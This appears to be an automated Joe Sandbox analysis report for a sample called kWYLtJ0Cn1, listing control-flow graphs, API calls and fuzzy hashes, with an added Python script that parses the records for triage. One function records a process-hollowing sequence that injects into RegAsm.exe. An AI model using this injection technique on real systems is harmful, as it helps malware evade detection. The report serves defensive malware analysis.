6335->6336 6337 fd2816 RaiseException 6336->6337 6338 fd282f 6337->6338 6338->6332 6340 f6ba40 6339->6340 6342 f6ba4a 6339->6342 6341 fba552 std::_Locinfo::_Locinfo_ctor 61 API calls 6340->6341 6341->6342 6342->6253 6343->6176 6344->6179 6346 f66fb6 6345->6346 6347 f66fa9 6345->6347 6346->6018 6348 f65bce _Deallocate 3 API calls 6347->6348 6348->6346 6350 f69e64 std::_Xinvalid_argument RaiseException 6349->6350 6351 f66fa0 6350->6351 6353 f67646 6352->6353 6354 f67653 6352->6354 6355 f66d09 4 API calls 6353->6355 6356 f6148c Concurrency::cancel_current_task RaiseException 6354->6356 6357 f6764f 6355->6357 6358 f67658 6356->6358 6357->6026 6359 f66d09 4 API calls 6358->6359 6360 f67662 6359->6360 6360->6026 6362 f66f43 6361->6362 6363 f66f33 6361->6363 6362->6028 6364 f65bce _Deallocate 3 API calls 6363->6364 6364->6362 6366 f69e64 std::_Xinvalid_argument RaiseException 6365->6366 6367 f66f2a 6366->6367 6368->5872 6532 fca220 6533 fca22c 6532->6533 6536 fca29b 6533->6536 6539 fb86b5 LeaveCriticalSection 6536->6539 6538 fca28d 6539->6538 6540 fe4a80 6541 f8da10 __Getctype 5 API calls 6540->6541 6542 fe4a93 6541->6542

Control-flow Graph

APIs
• CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,001E00FF,001E00EF), ref: 001E02FC
• VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 001E030F
• Wow64GetThreadContext.KERNEL32(00000110,00000000), ref: 001E032D
• ReadProcessMemory.KERNELBASE(00000114,?,001E0143,00000004,00000000), ref: 001E0351
• VirtualAllocEx.KERNELBASE(00000114,?,?,00003000,00000040), ref: 001E037C
• WriteProcessMemory.KERNELBASE(00000114,00000000,?,?,00000000,?), ref: 001E03D4
• WriteProcessMemory.KERNELBASE(00000114,00400000,?,?,00000000,?,00000028), ref: 001E041F
• WriteProcessMemory.KERNELBASE(00000114,?,?,00000004,00000000), ref: 001E045D
• Wow64SetThreadContext.KERNEL32(00000110,001F0000), ref: 001E0499
• ResumeThread.KERNELBASE(00000110), ref: 001E04A8
Memory Dump Source
• Source File: 00000000.00000002.1674829956.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1e0000_kWYLtJ0Cn1.jbxd
Similarity
• API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
• API String ID: 2687962208-1257834847
• Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
• Instruction ID: 82b35dcfc36c2a2bd7d95e938c269e2015ece6127bad23bd624aca1c8bad59d8
• Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
• Instruction Fuzzy Hash: 97B1E57260068AAFDB60CF69CC80BDA77A5FF8C714F158524EA0CAB341D774FA418B94

Control-flow Graph

control_flow_graph 187 fcc90d-fcc925 GetPEB 188 fcc936-fcc938 187->188 189 fcc927-fcc92b call fcafd3 187->189 190 fcc939-fcc93d 188->190 192 fcc930-fcc934 189->192 192->188 192->190
Memory Dump Source
• Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
• Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
Similarity
• Opcode ID: d9d4e2dfcbfd14504dd5c583896d366168cbc076de7f7db6caaae018fb7c7fb6
• Instruction ID: 74d1b713fd6930c44268dff3195cdfb3d9c3fab6129be7d808b86ec3a68053c5
• Opcode Fuzzy Hash: d9d4e2dfcbfd14504dd5c583896d366168cbc076de7f7db6caaae018fb7c7fb6
• Instruction Fuzzy Hash: 89E08C72911238EBCB25DF88CA05E8AF7ECEB88B10B15419AF605D3100C374DE00E7D0

Control-flow Graph

control_flow_graph 193 fc6108 call fcc90d 195 fc610d-fc6110 193->195 196 fc6127-fc6129 195->196 197 fc6112-fc6122 GetPEB 195->197 197->196 198 fc6124-fc6126 197->198
Memory Dump Source
• Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
Similarity
• Opcode ID: 1de4bcb73b141b582b0cb571b4a911e1f54f3f8ffa2eb27b21d741e3114bb213
• Instruction ID: 61154a14019e07ba96e5a34c32b0998e4bdf3ad97dc350c72c3d265b29a556a6
• Opcode Fuzzy Hash: 1de4bcb73b141b582b0cb571b4a911e1f54f3f8ffa2eb27b21d741e3114bb213
• Instruction Fuzzy Hash: A4C08C7840098147CE298D109B73FE63754A391F9BF8824CCC4078BE43C52E9C82FA00

Control-flow Graph

control_flow_graph 23 fcada8-fcadb4 24 fcae46-fcae49 23->24 25 fcae4f 24->25 26 fcadb9-fcadca 24->26 27 fcae51-fcae55 25->27 28 fcadcc-fcadcf 26->28 29 fcadd7-fcadf0 LoadLibraryExW 26->29 30 fcae6f-fcae71 28->30 31 fcadd5 28->31 32 fcae56-fcae66 29->32 33 fcadf2-fcadfb GetLastError 29->33 30->27 35 fcae43 31->35 32->30 34 fcae68-fcae69 FreeLibrary 32->34 36 fcadfd-fcae0f call fca0d8 33->36 37 fcae34-fcae41 33->37 34->30 35->24 36->37 40 fcae11-fcae23 call fca0d8 36->40 37->35 40->37 43 fcae25-fcae32 LoadLibraryExW 40->43 43->32 43->37
APIs
• FreeLibrary.KERNEL32(00000000,?,00FCAEB5,?,00000000,00F63ADC,00000001,00000000,?,00FCAAB2,00000000,AreFileApisANSI,00FEE6A4,AreFileApisANSI,00FCB775,00FB86D1), ref: 00FCAE69
Memory Dump Source
• Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
Similarity
• API ID: FreeLibrary
• String ID: api-ms-$ext-ms-
• API String ID: 3664257935-537541572
• Opcode ID: 0d8c0748c61be8552a54676ca254534fc5613ee4e19e71b15f6c63e1c9c51789
• Instruction ID: f1049ba1c5d6761554e1116c21ded671faee7310317fdc9db0da7632ab717c51
• Opcode Fuzzy Hash: 0d8c0748c61be8552a54676ca254534fc5613ee4e19e71b15f6c63e1c9c51789
• Instruction Fuzzy Hash: 08216D32E0121BA7CB218B22ED86F9A3728AF41778F150128F915A72C0D734FD00F6D2

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32(?,?,00FC6085,00FE7ED4,?,?,?,29949A30), ref: 00FC609C
• TerminateProcess.KERNEL32(00000000,?,00FC6085,00FE7ED4,?,?,?,29949A30), ref: 00FC60A3
• ExitProcess.KERNEL32 ref: 00FC60B5
Memory Dump Source
• Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• API String ID: 1703294689-0
• Opcode ID: 5d8f3f2858a1a34d08a3c49ec5615569eac6121fc8d9914bff780e9be8939d47
• Instruction ID: fa965bea1e1e50730285faf06bc6002091f983139abb1b580129fa6323936caa
• Opcode Fuzzy Hash: 5d8f3f2858a1a34d08a3c49ec5615569eac6121fc8d9914bff780e9be8939d47
• Instruction Fuzzy Hash: 60D09E3140814ABFCF112F61DD4FD893F29EF417567058059B90999032DF799952FA90

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 00F646FA: _strlen.LIBCMT ref: 00F64712
                                                                                      • VirtualAllocEx.KERNELBASE(000000FF,00000000,000004AC,00001000,00000040,?,0000000006:1@0000000005:@), ref: 00F63B50
                                                                                        • Part of subcall function 00F63A4A: _Deallocate.LIBCONCRT ref: 00F63AF7
                                                                                        • Part of subcall function 00F63663: OffsetRect.USER32(00000000,00000000,00000000), ref: 00F63734
                                                                                        • Part of subcall function 00F64C6D: _Deallocate.LIBCONCRT ref: 00F64C7C
                                                                                      Strings
                                                                                      • 0000000006:1@0000000005:@, xrefs: 00F63B1F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Deallocate$AllocOffsetRectVirtual_strlen
                                                                                      • String ID: 0000000006:1@0000000005:@
                                                                                      • API String ID: 555218544-176982251

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(00000000,00000000,?,00FB4380,00000000,00000000,00000000,00000000,?,00FD13CC,29949A30,00F63ADC,00000000,00000000,00F63ADC,00000000), ref: 00FA865E
                                                                                      • SetLastError.KERNEL32(00000000,00000000,00000000,00F63ADC,00000000,00000000,00F63ADC,00000000,00000000,?,00FBA303,?,?), ref: 00FA8694
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 1452528299-0

                                                                                      Control-flow Graph (image; basic blocks fcae73-fcaef5, including a GetProcAddress call)

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000008,00F63ADC,00000000,?,00FCC62C,00000001,00000364,00000005,000000FF,00000000,00000000,?,00FA868A,00000000,?,00000000), ref: 00FCA802
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      APIs
                                                                                      • GetLocaleInfoW.KERNEL32(51CEB70F,2000000B,00000000,00000002,00000000,?,?,?,00FD974F,?,00000000), ref: 00FD94CA
                                                                                      • GetLocaleInfoW.KERNEL32(51CEB70F,20001004,00000000,00000002,00000000,?,?,?,00FD974F,?,00000000), ref: 00FD94F3
                                                                                      • GetACP.KERNEL32(?,?,00FD974F,?,00000000), ref: 00FD9508
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: InfoLocale
                                                                                      • String ID: ACP$OCP
                                                                                      • API String ID: 2299586839-711371036
                                                                                      APIs
                                                                                        • Part of subcall function 00FCC3E7: GetLastError.KERNEL32(?,00000008,00FCA5D6), ref: 00FCC3EB
                                                                                        • Part of subcall function 00FCC3E7: SetLastError.KERNEL32(00000000), ref: 00FCC48D
                                                                                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 00FD9712
                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 00FD975B
                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 00FD976A
                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00FD97B2
                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00FD97D1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                      • String ID:
                                                                                      • API String ID: 415426439-0
                                                                                      APIs
                                                                                        • Part of subcall function 00FCC3E7: GetLastError.KERNEL32(?,00000008,00FCA5D6), ref: 00FCC3EB
                                                                                        • Part of subcall function 00FCC3E7: SetLastError.KERNEL32(00000000), ref: 00FCC48D
                                                                                      • GetACP.KERNEL32(?,?,?,?,?,?,00FC8CB2,?,?,?,?,?,-00000050,?,?,?), ref: 00FD8D45
                                                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00FC8CB2,?,?,?,?,?,-00000050,?,?), ref: 00FD8D70
                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00FD8ED3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                      • String ID: utf8
                                                                                      • API String ID: 607553120-905460609
                                                                                      • Opcode ID: 66f7c7a199621ddf30cdd5bfe0e155c099290e84f635f10ddce18a9d5329947e
                                                                                      • Instruction ID: 8e79e8c303c6b45f29b0f52239a0b7a71d36cce347320f1988a1fb7a11a0d86c
                                                                                      • Opcode Fuzzy Hash: 66f7c7a199621ddf30cdd5bfe0e155c099290e84f635f10ddce18a9d5329947e
                                                                                      • Instruction Fuzzy Hash: B0710672A00206AADB24AB75CC46FB673AAEF54790F18442BF505D72C1EE74DD42AB60
                                                                                      APIs
                                                                                        • Part of subcall function 00FCC3E7: GetLastError.KERNEL32(?,00000008,00FCA5D6), ref: 00FCC3EB
                                                                                        • Part of subcall function 00FCC3E7: SetLastError.KERNEL32(00000000), ref: 00FCC48D
                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FD9109
                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FD9153
                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FD9219
Memory Dump Source
• Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
Similarity
• API ID: InfoLocale$ErrorLast
• String ID:
• API String ID: 661929714-0
• Opcode ID: 78f82c80190e407e1656dfa04baa05daead5a209f5eb6968ba766ebeb64101ac
• Instruction ID: 7d47e9148b7bb4570ce649ef851cc56654c392e0e0f223562447a904ab684280
• Opcode Fuzzy Hash: 78f82c80190e407e1656dfa04baa05daead5a209f5eb6968ba766ebeb64101ac
• Instruction Fuzzy Hash: A761E131908107AFDB28DF64CC86BBA77AAEF05311F18417AE905C6385E7B9D981EB50
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000000), ref: 00FD281F
Memory Dump Source
• Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: 9475664af5e29210af0c3e488bdc8b14cb88e818eda3e0f465d1d6a4e164c891
• Instruction ID: 190a38e17baaf27bdd5075e863cf05c42a68b32814a9e789552681e06d483417
• Opcode Fuzzy Hash: 9475664af5e29210af0c3e488bdc8b14cb88e818eda3e0f465d1d6a4e164c891
• Instruction Fuzzy Hash: 2DB16F31610605CFD769CF28C486B547BA1FF54364F29865AE899CF3A1C335E982EB80
APIs
  • Part of subcall function 00FCC3E7: GetLastError.KERNEL32(?,00000008,00FCA5D6), ref: 00FCC3EB
  • Part of subcall function 00FCC3E7: SetLastError.KERNEL32(00000000), ref: 00FCC48D
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FD935C
Memory Dump Source
• Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
Similarity
• API ID: ErrorLast$InfoLocale
• String ID:
• API String ID: 3736152602-0
• Opcode ID: f05d99c1294fb13d8dc9e45768285b5193c5020504394a54d91a624f7e5afebf
• Instruction ID: bce2f75a20b07244f359cc02e98dd3f413fd6fd19a5e47bf14f26b07677c1cba
• Opcode Fuzzy Hash: f05d99c1294fb13d8dc9e45768285b5193c5020504394a54d91a624f7e5afebf
• Instruction Fuzzy Hash: CA21B632A182069BDF18AB54DC42FBE73ADEF45314B18407FF901D6281E6B9DD00EB50
APIs
  • Part of subcall function 00FCC3E7: GetLastError.KERNEL32(?,00000008,00FCA5D6), ref: 00FCC3EB
  • Part of subcall function 00FCC3E7: SetLastError.KERNEL32(00000000), ref: 00FCC48D
• EnumSystemLocalesW.KERNEL32(00FD90B5,00000001,00000000,?,?,?,00FD96E6,00000000,?,?,?), ref: 00FD9001
Memory Dump Source
• Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
• Opcode ID: 2e3b7ddbf12f18d85072dce9915bc2ea7bb4e3b56f18e877829e354790268a67
• Instruction ID: 9fcf3a13deccbe70b4137232d92193e0531626ca3fb8833e9cdcbb4e6931b28b
• Opcode Fuzzy Hash: 2e3b7ddbf12f18d85072dce9915bc2ea7bb4e3b56f18e877829e354790268a67
• Instruction Fuzzy Hash: 751129366047015FDB189F79D89557ABB93FF80368B18442EE58787B40D775A903D740
APIs
  • Part of subcall function 00FCC3E7: GetLastError.KERNEL32(?,00000008,00FCA5D6), ref: 00FCC3EB
  • Part of subcall function 00FCC3E7: SetLastError.KERNEL32(00000000), ref: 00FCC48D
• GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00FD92D1,00000000,00000000,?), ref: 00FD9563
Memory Dump Source
• Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
Similarity
• API ID: ErrorLast$InfoLocale
• String ID:
• API String ID: 3736152602-0
• Opcode ID: 8d091dd355546d2361852344f5621f29f4a4bfd11d0634cc6ce9332ebe6003f7
• Instruction ID: 9988ae041dfd8c8c7717ef5669350075f33a5f3ea01df919def351335c07755d
• Opcode Fuzzy Hash: 8d091dd355546d2361852344f5621f29f4a4bfd11d0634cc6ce9332ebe6003f7
• Instruction Fuzzy Hash: 10F0FE36A041167BDB2557A09C45BFA7795DB40364F0C4439EC06A3240DBB4FE41E690
APIs
  • Part of subcall function 00FCC3E7: GetLastError.KERNEL32(?,00000008,00FCA5D6), ref: 00FCC3EB
  • Part of subcall function 00FCC3E7: SetLastError.KERNEL32(00000000), ref: 00FCC48D
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00FD8ED3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
Similarity
• API ID: ErrorLast$InfoLocale
• String ID: utf8
• API String ID: 3736152602-905460609
• Opcode ID: 8675c0e3dfcf5e423057b0e479ada135225aa581b703cc3e7cc08a5d9879c5fa
• Instruction ID: 8934ca0c1e16f8fb7cf8e5bd99cf946ad83e125c37ee67a83e2810d309aea8a3
• Opcode Fuzzy Hash: 8675c0e3dfcf5e423057b0e479ada135225aa581b703cc3e7cc08a5d9879c5fa
• Instruction Fuzzy Hash: E4F0A432610149ABC714AB64DC8AEFA73ACDF45314F15417EF506D7281DA78AD05A790
APIs
  • Part of subcall function 00FCC3E7: GetLastError.KERNEL32(?,00000008,00FCA5D6), ref: 00FCC3EB
  • Part of subcall function 00FCC3E7: SetLastError.KERNEL32(00000000), ref: 00FCC48D
• EnumSystemLocalesW.KERNEL32(00FD9308,00000001,?,?,?,?,00FD96AA,?,?,?,?), ref: 00FD9074
Memory Dump Source
• Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
• Opcode ID: f272e9d860fd459b5a5655806097c49e38240b394962384eec4811c05bcc3b89
• Instruction ID: 63bae8791398e3a8bca01c01971c3f172f47776d588a1d2195c597fb641e93d0
• Opcode Fuzzy Hash: f272e9d860fd459b5a5655806097c49e38240b394962384eec4811c05bcc3b89
• Instruction Fuzzy Hash: 5CF0F6363043045FDB24AF75AC89A7A7B96EF81368B09442EFA468B780C6F69C01E750
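The per-function records in this part of the report (an APIs list, a Memory Dump Source line and a Similarity block carrying the Opcode ID and the fuzzy hashes) are regular enough to parse mechanically, which is how an analyst diffs one report against another for a related sample. The Python below is an added example and is not part of the Joe Sandbox report or its tooling. It parses records of this shape, separates calls the plugin attributes to a subcall from the function's own calls, and marks records whose only APIs are the locale and last-error calls the MSVC C runtime makes while initialising locale state, so that the reviewer can set those aside and concentrate on the remaining Opcode IDs and Instruction Fuzzy Hashes. The SAMPLE text is constructed from three of the entries above; the CRT_LOCALE_NOISE set is the example's own assumption about which APIs are CRT plumbing rather than loader logic.

```python
"""Parse Joe Sandbox per-function records into structured dicts.

Added example, not Joe Sandbox code. SAMPLE is constructed from three
function entries of the report for kWYLtJ0Cn1.exe; the record layout it
assumes is: an 'APIs' line, bullet lines for each call (sub-bullets for
calls attributed to a subcall), then 'Memory Dump Source' and
'Similarity' bullets with 'Key: value' fields."""
import re
from collections import defaultdict

SAMPLE = """\
APIs
  • Part of subcall function 00FCC3E7: GetLastError.KERNEL32(?,00000008,00FCA5D6), ref: 00FCC3EB
  • Part of subcall function 00FCC3E7: SetLastError.KERNEL32(00000000), ref: 00FCC48D
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FD935C
Memory Dump Source
• Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
Similarity
• API ID: ErrorLast$InfoLocale
• String ID:
• API String ID: 3736152602-0
• Opcode ID: f05d99c1294fb13d8dc9e45768285b5193c5020504394a54d91a624f7e5afebf
• Instruction Fuzzy Hash: CA21B632A182069BDF18AB54DC42FBE73ADEF45314B18407FF901D6281E6B9DD00EB50
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000000), ref: 00FD281F
Memory Dump Source
• Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: 9475664af5e29210af0c3e488bdc8b14cb88e818eda3e0f465d1d6a4e164c891
• Instruction Fuzzy Hash: 2DB16F31610605CFD769CF28C486B547BA1FF54364F29865AE899CF3A1C335E982EB80
APIs
• EnumSystemLocalesW.KERNEL32(00FCA85E,00000001,00FFA380,0000000C,00FCB19E,?,?,?,00000000), ref: 00FCA8A9
Memory Dump Source
• Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
Similarity
• API ID: EnumLocalesSystem
• String ID:
• API String ID: 2099609381-0
• Opcode ID: 6df33ba9b453e625b19dca04045d789f1f647999af5bdbc7d93ce1091790da32
"""

# One API call line: optional "Part of subcall function <addr>:" prefix,
# then Name.MODULE(args), ref: <addr>.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<subcall>[0-9A-F]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
# Any other "• Key: value" bullet (Source File, API ID, Opcode ID, ...).
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+?):\s*(?P<value>.*?)\s*$")

# Assumption of this example: Win32 calls made by the MSVC CRT's locale
# initialisation and its GetLastError/SetLastError preserving wrapper.
CRT_LOCALE_NOISE = {"GetLocaleInfoW", "EnumSystemLocalesW", "IsValidCodePage",
                    "IsValidLocale", "GetLastError", "SetLastError"}


def parse_entries(text):
    """Split report text into records, one per 'APIs' heading."""
    entries, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = {"apis": [], "fields": {}}
            entries.append(current)
            continue
        if current is None or not stripped.startswith("•"):
            continue  # section headings such as 'Similarity' carry no data
        m = API_RE.match(line)
        if m:
            current["apis"].append({
                "name": m["name"], "module": m["module"],
                "args": m["args"].split(",") if m["args"] else [],
                "ref": m["ref"], "subcall": m["subcall"],
            })
            continue
        m = FIELD_RE.match(line)
        if m:
            current["fields"][m["key"]] = m["value"]
    return entries


def direct_calls(entry):
    """API names the function calls itself (subcall-attributed calls excluded)."""
    return [a["name"] for a in entry["apis"] if a["subcall"] is None]


def is_crt_locale_noise(entry):
    """True when every call in the record belongs to CRT_LOCALE_NOISE."""
    names = {a["name"] for a in entry["apis"]}
    return bool(names) and names <= CRT_LOCALE_NOISE


def fingerprints(entries):
    """Opcode ID -> Instruction Fuzzy Hash (None if the record has none)."""
    return {e["fields"]["Opcode ID"]: e["fields"].get("Instruction Fuzzy Hash")
            for e in entries if "Opcode ID" in e["fields"]}


def api_index(entries):
    """Reverse index: API name -> Opcode IDs of the functions that call it."""
    index = defaultdict(list)
    for e in entries:
        for a in e["apis"]:
            index[a["name"]].append(e["fields"].get("Opcode ID"))
    return dict(index)


def triage(text):
    """Records whose API usage is not explained by CRT locale initialisation."""
    return [e for e in parse_entries(text) if not is_crt_locale_noise(e)]


if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        tag = "crt-noise" if is_crt_locale_noise(e) else "review"
        print(tag, e["fields"]["Opcode ID"][:16], direct_calls(e))
```

Run against the three constructed records, only the RaiseException function survives triage; the two locale records are set aside as CRT plumbing, and their Opcode IDs remain available through fingerprints() for comparison with a second report.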
APIs
• EnumSystemLocalesW.KERNEL32(00FCA85E,00000001,00FFA380,0000000C,00FCB19E,?,?,?,00000000), ref: 00FCA8A9
Memory Dump Source
• Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
Similarity
                                                                                      • API ID: EnumLocalesSystem
                                                                                      • String ID:
                                                                                      • API String ID: 2099609381-0
                                                                                      • Opcode ID: 6df33ba9b453e625b19dca04045d789f1f647999af5bdbc7d93ce1091790da32
                                                                                      • Instruction ID: c33fe9b05af0a5aae453868355a42a01bd7565080f43c21d301859001bb8520e
                                                                                      • Opcode Fuzzy Hash: 6df33ba9b453e625b19dca04045d789f1f647999af5bdbc7d93ce1091790da32
                                                                                      • Instruction Fuzzy Hash: FAF03772A40209EFD700EF98E942B9877F0FB44725F00411AF415DB2D1CBBA9900EF51
APIs
  • Part of subcall function 00FCC3E7: GetLastError.KERNEL32(?,00000008,00FCA5D6), ref: 00FCC3EB
  • Part of subcall function 00FCC3E7: SetLastError.KERNEL32(00000000), ref: 00FCC48D
• EnumSystemLocalesW.KERNEL32(00FD8E7F,00000001,?,?,?,00FD9708,?,?,?,?), ref: 00FD8F5D
Memory Dump Source
• Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
• Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
• Opcode ID: 53bffac545b53acb6ec3a7bc6905fcaf6b435cee85a0ee9aebdf129ee28c1c3b
